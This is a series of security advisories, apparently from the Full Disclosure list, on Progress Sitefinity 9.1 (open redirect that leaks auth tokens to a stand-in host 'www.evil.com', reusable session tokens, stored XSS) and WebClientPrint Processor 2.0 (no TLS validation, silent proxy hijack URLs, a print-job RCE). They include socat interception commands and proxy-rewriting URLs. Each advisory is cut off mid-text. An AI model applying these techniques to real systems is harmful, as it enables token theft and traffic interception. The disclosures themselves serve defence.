[FD] SEC Consult SA-20170822-0 :: Multiple vulnerabilities in Progress Sitefinity CMS
SEC Consult Vulnerability Lab Security Advisory < 20170822-0 >
===
title: Multiple vulnerabilities
product: Progress Sitefinity
vulnerable version: 9.1
fixed version: 10.1
CVE number: -
impact: High
homepage: http://www.sitefinity.com | https://www.progress.com
found: 2016-10-21
by: Siddhartha Tripathy & Mingshuo Li (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Progress Sitefinity is a content management and marketing analytics
platform designed to maximize the agility needed to succeed in today’s rapidly
changing digital marketplace.
It provides developers and IT teams the tools they need to support
enterprise-level digital marketing, optimizing the customer journey by
delivering seamless personalized experiences across different technologies and
devices. Progress is a trusted source for the digital marketing innovation
needed to create transformative customer experiences that fuel business
success."
Source: http://www.sitefinity.com/about
Business recommendation:
SEC Consult recommends applying the provided patches by the vendor immediately.
Additionally, there are strong indications for further vulnerabilities and it
is highly suggested to perform a thorough security review by security
professionals to lower the risk of using this product.
Vulnerability overview/description:
---
1) Open Redirect Vulnerabilities
Several scripts of Sitefinity are vulnerable to an open redirect. This
vulnerability allows an attacker to redirect the victim to any site by using a
manipulated link (e.g. a manipulated link in a phishing mail, forum or a
guestbook). The redirection target could imitate the original site and might
be used for phishing attacks or for running browser exploits to infect the
victim’s machine with malware. Because the server name in the manipulated link
is identical to the original site, phishing attempts have a more trustworthy
appearance.
In the first instance of this vulnerability, the open redirect will forward
an authentication token to the attacker controlled site, which can be abused
by the attacker to initiate new sessions for the affected user.
2) Broken Session Management
During the authentication process, Sitefinity creates an authentication token
"wrap_access_token", which is further used as a GET parameter to initiate a
valid session if the supplied credentials have been verified to be correct.
Transporting this token as GET parameter causes unnecessary exposure of the
sensitive token, as it might end up in proxy or access logs.
Furthermore, this token is not tied to the session ID and can be used to
generate new valid sessions for the user, even if the initial session has been
terminated by the user. The token will also survive a password change (e.g. if
the user suspects misuse of his account) and can still be used to initiate new
sessions. During the timeframe of testing, no expiry of the token could be
observed. The wrap_access_token can thus be seen as a "Kerberos golden ticket"
for Sitefinity.
3) Permanent Cross-Site Scripting
Multiple scripts do not properly sanitize/encode user input, which leads to
permanent cross site scripting vulnerabilities. Furthermore, the web
application allows users to upload HTML files, which are provided via the same
domain, allowing an authenticated attacker to access arbitrary information and
execute arbitrary functions of Sitefinity on behalf of other users. These
vulnerabilities can be used by attackers to circumvent segregation of duties.
Proof of concept:
-
1a) Open Redirection with Access Token
On the Sitefinity login site, the "realm" parameter will point the user to the
actual location, once the user authenticates successfully. The parameter must
start with the actual URL "http://www.example.com; to act as a valid
destination. However, the filter can be circumvented by appending the at
symbol ("%40", @) followed by an attacker controlled host name (e.g.
"www.evil.com"). In this case, the original URL will be forwarded to the
attacker controlled host as username.
Successfully authenticating with the below URL will forward the victim to the
attacker controlled host "www.evil.com"
===
http://www.example.com/Sitefinity/Authentic
[FD] [RT-SA-2015-011] WebClientPrint Processor 2.0: No Validation of TLS Certificates
Advisory: WebClientPrint Processor 2.0: No Validation of TLS Certificates RedTeam Pentesting discovered that WebClientPrint Processor (WCPP) does not validate TLS certificates when initiating HTTPS connections. Thus, a man-in-the-middle attacker may intercept and/or modify HTTPS traffic in transit. This may result in a disclosure of sensitive information and the integrity of printed documents cannot be guaranteed. Details === Product: Neodynamic WebClientPrint Processor Affected Versions: 2.0.15.109 (Microsoft Windows) Fixed Versions: >= 2.0.15.910 Vulnerability Type: Improper Certificate Validation Security Risk: medium Vendor URL: http://www.neodynamic.com/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-011 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction Neodynamic's WebClientPrint Processor is a client-side application, which allows server-side applications to print documents on a client's printer without user interaction, bypassing the browser's print functionality. The server-side application may be written in ASP.NET or PHP while on the client-side multiple platforms and browsers are supported. "Send raw data, text and native commands to client printers without showing or displaying any print dialog box!" (Neodynamic's website) More Details Upon installation under Microsoft Windows, WCPP registers itself as a handler for the "webclientprint" URL scheme. Thus, any URL starting with "webclientprint:" is handled by WCPP. For example, entering webclientprint:-about in the URL bar of a browser opens the about box of WCPP. Neodynamic prodvides an online demo for test printing at the following URL: http://webclientprint.azurewebsites.net/ If visited via HTTPS, the WCPP component on the client-side will try to fetch the print job via HTTPS as well. Proof of Concept To simulate a man-in-the-middle scenario, an entry similar to the following was appended to the "hosts" file: 10.0.2.2 webclientprint.azurewebsites.net On the host 10.0.2.2, a self-signed certificate can be generated and afterwards socat[1] can be used to intercept and display the encrypted HTTP traffic as follows: $ openssl genrsa -out server.key 4096 $ openssl dhparam -out dhparam.pem 1024 $ openssl req -new -x509 -key server.key -out server.pem -days 365 \ -subj /CN=webclientprint.azurewebsites.net $ cat server.key >> server.pem $ cat dhparam.pem >> server.pem $ sudo socat -v openssl-listen:443,reuseaddr,verify=0,fork,\ cert=server.pem openssl-connect:webclientprint.azurewebsites.net:443,\ verify=0 The demo website is available via HTTPS using the following URL: https://webclientprint.azurewebsites.net/ Any modern browser displays a warning due to the invalid TLS certificate presented by socat. On the contrary, WCPP simply accepts any certificate it is presented with, when, for examplem printing a demo TXT file. Such a request is given in the listing below. The output has been shortened and wrapped manually for better readability. GET /DemoPrintFile.ashx?clientPrint=undefined& printerName=null=TXT HTTP/1.0\r Host: webclientprint.azurewebsites.net\r User-Agent: WCPP/2.0.15.109(Windows; 6.1)\r Accept-Encoding: gzip, deflate\r \r < 2015/09/07 10:29:27.478913 length=3538 from=0 to=3537 HTTP/1.1 200 OK\r Cache-Control: private\r Content-Length: 3180\r Content-Type: application/octet-stream\r Server: Microsoft-IIS/8.0\r X-AspNet-Version: 4.0.30319\r X-Powered-By: ASP.NET\r Set-Cookie: ARRAffinity=23c01e1a9de38f884445e396de9940aef5941b9af3f6d9 cfa57066fe4d5fcb16;Path=/;Domain=webclientprint.azurewebsites.net\r Date: Mon, 07 Sep 2015 08:29:27 GMT\r Connection: close\r \r cpj..\v...\v..wcpPF:9c8d5316ffeb403d8be09565c2391f92.TXT|Printed By WebClientPrint\r =\r \r Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce urna massa, eleifend non posuere quis, iaculis et libero. Curabitur lacinia dolor non nisl pharetra tempus. [...] Etiam nisl nisi, eleifend vel molestie tincidunt, porttitor ac nunc. Vestibulum vulputate magna gravida neque imperdiet ac viverra nulla suscipit..Acopian Technical Company - 1 WebApp Lic - 2 WebServer Lic|x This shows that WCPP does not verify TLS certificates when establishing HTTPS connections. Workaround == Affected users should disable the WCPP handler and upgrade to a fixed version as soon as
[FD] [RT-SA-2015-010] WebClientPrint Processor 2.0: Unauthorised Proxy Modification
Advisory: WebClientPrint Processor 2.0: Unauthorised Proxy Modification RedTeam Pentesting discovered that attackers can configure a proxy host and port to be used when fetching print jobs with WebClientPrint Processor (WCPP). This proxy setting may be distributed via specially crafted websites and is set without any user interaction as soon as the website is accessed. Details === Product: Neodynamic WebClientPrint Processor Affected Versions: 2.0.15.109 (Microsoft Windows) Fixed Versions: >= 2.0.15.910 Vulnerability Type: Man-in-the-Middle Security Risk: medium Vendor URL: http://www.neodynamic.com/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-010 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction Neodynamic's WebClientPrint Processor is a client-side application, which allows server-side applications to print documents on a client's printer without user interaction, bypassing the browser's print functionality. The server-side application may be written in ASP.NET or PHP while on the client-side multiple platforms and browsers are supported. "Send raw data, text and native commands to client printers without showing or displaying any print dialog box!" (Neodynamic's website) More Details Upon installation under Microsoft Windows, WCPP registers itself as a handler for the "webclientprint" URL scheme. Thus, any URL starting with "webclientprint:" is handled by WCPP. For example, entering webclientprint:-about in the URL bar of a browser opens the about box of WCPP. During RedTeam Pentesting's analysis of WCPP it was determined that WCPP ignores the system proxy configuration and by default tries to fetch print jobs directly, bypassing a proxy potentially configured in the system. WCPP can however be configured to use a (possibly different) proxy through "webclientprint" URLs. For example, visiting the following URL will set 192.0.2.1 as a proxy IP for WCPP: webclientprint:-proxyHost:192.0.2.1 Likewise, the port of the proxy can be changed to 14141 through this URL: webclientprint:-proxyPort:14141 As soon as a proxy is initially configured, it will be used permanently without the need for any further confirmation. If a proxy was already configured before the URLs above are invoked, the old proxy will be replaced by the new one. Proof of Concept An attacker may prepare a malicious website with the following content: When visited by a WCPP user, the proxy host will be rewritten without any user interaction and without any visual indication. Likewise, the following HTML code may be used to define another proxy port when visited: This allows the proxy configuration to be changed without authorisation. Workaround == Affected users should disable the WCPP handler and upgrade to a fixed version as soon as possible. Fix === Install a WCPP version greater or equal to 2.0.15.910[0]. Security Risk = If print jobs are fetched by WCPP over unencrypted HTTP, the unauthorised change of the proxy configuration may be exploited to yield a man-in-the-middle position. Attackers only need to trick users into visiting an attacker-controlled website which contains the configuration URLs as outlined above. Afterwards, all jobs printed via WCPP and fetched over HTTP will be requested through the proxy. This may lead to a disclosure of sensitive information depending on the printed documents. Furthermore, the integrity of the printed documents cannot be guaranteed anymore as attackers may also change the documents in transit. If print jobs are fetched by WCPP over encrypted HTTPS, the unauthorised change of the proxy configuration results in a denial of service. After establishing a connection to the proxy, neither an HTTP request nor a TLS ClientHello is sent. The exact cause was not investigated any further. Overall, this vulnerability is rated as a medium risk. This estimation may need to be adapted depending on the protocol that is used to fetch print jobs. Timeline 2015-08-24 Vulnerability identified 2015-09-03 Customer approved disclosure to vendor 2015-09-04 Asked vendor for security contact 2015-09-04 CVE number requested 2015-09-04 Vendor responded with security contact 2015-09-07 Vendor notified 2015-09-07 Vendor acknowledged receipt of advisory 2015-09-15 Vendor released fixed version 2015-09-16 Customer asked to wait with advisory release until all their clients are updated 2017-07-31 Customer approved advisory release 2017-08-22 Advisory
[FD] [RT-SA-2015-008] WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs
Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs
RedTeam Pentesting discovered that malicious print jobs can be used to
trigger a remote code execution vulnerability in WebClientPrint
Processor (WCPP). These print jobs may be distributed via specially
crafted websites and are processed without any user interaction as soon
as the website is accessed.
Details
===
Product: Neodynamic WebClientPrint Processor
Affected Versions: 2.0.15.109 (Microsoft Windows)
Fixed Versions: >= 2.0.15.910
Vulnerability Type: Remote Code Execution
Security Risk: high
Vendor URL: http://www.neodynamic.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-008
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
Neodynamic's WebClientPrint Processor is a client-side application which
allows server-side applications to print documents on a client's printer
without user interaction, bypassing the browser's print functionality.
The server-side application may be written in ASP.NET or PHP while on
the client-side multiple platforms and browsers are supported.
"Send raw data, text and native commands to client printers without
showing or displaying any print dialog box!" (Neodynamic's website)
More Details
Upon installation under Microsoft Windows, WCPP registers itself as a
handler for the "webclientprint" URL scheme. Thus, any URL starting with
"webclientprint:" is handled by WCPP. For example, entering
webclientprint:-about
in the URL bar of a browser opens the about box of WCPP.
In order to automatically print a text file using WCPP, a URL such as
the following is requested (e.g. via JavaScript code or an iframe HTML
tag in a website):
webclientprint:https://example.com/somedir/lorem.txt
The file lorem.txt conforms to Neodynamic's proprietary file format CPJ
and contains the following data:
---
$ xxd lorem.txt
: 6370 6a02 fc0b 070c 7763 7050 cpj.wcpP
0010: 463a 6632 3330 6262 3766 3965 3338 3437 F:f230bb7f9e3847
0020: 3633 6132 3765 6663 3565 6237 6633 6436 63a27efc5eb7f3d6
0030: 6661 2e54 5854 7c50 7269 6e74 6564 2042 fa.TXT|Printed B
0040: 7920 5765 6243 6c69 656e 7450 7269 6e74 y WebClientPrint
0050: 0d0a 3d3d 3d3d 3d3d 3d3d 3d3d 3d3d 3d3d ..==
0060: 3d3d 3d3d 3d3d 3d3d 3d3d 3d0d 0a0d 0a4c ===L
0070: 6f72 656d 2069 7073 756d 2064 6f6c 6f72 orem ipsum dolor
0080: 2073 6974 2061 6d65 742c 2063 6f6e 7365 sit amet, conse
0090: 6374 6574 7572 2061 6469 7069 7363 696e ctetur adipiscin
00a0: 6720 656c 6974 2e20 4675 7363 6520 7572 g elit. Fusce ur
[...]
0bc0: 6275 6c75 6d20 7675 6c70 7574 6174 6520 bulum vulputate
0bd0: 6d61 676e 6120 6772 6176 6964 6120 6e65 magna gravida ne
0be0: 7175 6520 696d 7065 7264 6965 7420 6163 que imperdiet ac
0bf0: 2076 6976 6572 7261 206e 756c 6c61 2073 viverra nulla s
0c00: 7573 6369 7069 742e 0150 4446 4372 6561 uscipit..PDFCrea
0c10: 746f 7241 636f 7069 616e 2054 6563 686e torAcopian Techn
0c20: 6963 616c 2043 6f6d 7061 6e79 202d 2031 ical Company - 1
0c30: 2057 6562 4170 7020 4c69 6320 2d20 3220 WebApp Lic - 2
0c40: 5765 6253 6572 7665 7220 4c69 637c WebServer Lic|xx
0c50:
0c60:
0c70: xx
---
It was obtained from Neodynamic's online demo website[0]. Briefly, its
structure can be described as follows:
Offset Size Usage
---
0 3 magic bytes "cpj"
3 1 unknown
4 4 offset "pc" (32 bit LE) for printer configuration
8 4 offset "lk" (32 bit LE) for license key
0x0c 6 filename/content header "wcpPF:"
0x12 -filename and content separated by pipe ("|") character
pc+0x12 - printer configuration
lk+0x12 - license key
In the example above, the file "f230bb7f9e384763a27efc5eb7f3d6fa.TXT"
would be printed on the printer with the name "PDFCreator". The license
key at the end of the file was intentionally redacted. Prior to
printing, the text file with the dummy content is created in the current
user's %TEMP% directory. Typically, this directory is located at:
C:\Users\\AppData\Local\Temp\
Proof of Concept
During RedTeam
